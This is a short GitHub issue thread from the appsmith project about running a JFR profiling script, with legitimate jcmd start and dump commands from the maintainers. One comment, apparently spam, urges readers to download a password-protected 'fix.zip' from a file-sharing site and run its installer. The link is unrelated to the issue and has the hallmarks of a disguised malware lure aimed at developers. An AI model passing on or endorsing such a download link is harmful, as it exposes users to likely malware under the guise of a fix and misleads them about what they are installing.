### ISSUE TITLE
[Task]: Setup the JFR profiling script locally to check the threads

### ISSUE THREAD

**Issue by NilanshBansal** [appsmithorg/appsmith#35935]
### SubTasks

JFR script - https://github.com/appsmithorg/appsmith/blob/release/deploy/docker/fs/opt/appsmith/thread-profile-start.shif. 
Steps to take JFR profile in prod follow these steps 
https://www.notion.so/appsmith/Evidence-collection-ecd3a09086ee4c489300f214d7a933cd

Ref: https://theappsmith.slack.com/archives/C06FWBV74GH/p1724833745301949?thread_ts=1724314641.154029&cid=C06FWBV74GH

**Comment by NilanshBansal** [comment]
@ApekshaBhosale can you please add the JFR start and stop commands here.

**Comment by chenshupe** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NilanshBansal** [comment]
Start Command: jcmd <PID> JFR.start name=profile filename=jfr-recording.jfr
Stop Command: jcmd <PID> JFR.dump name=profile

Download Tool: JDK Mission Control to analyse the recordings
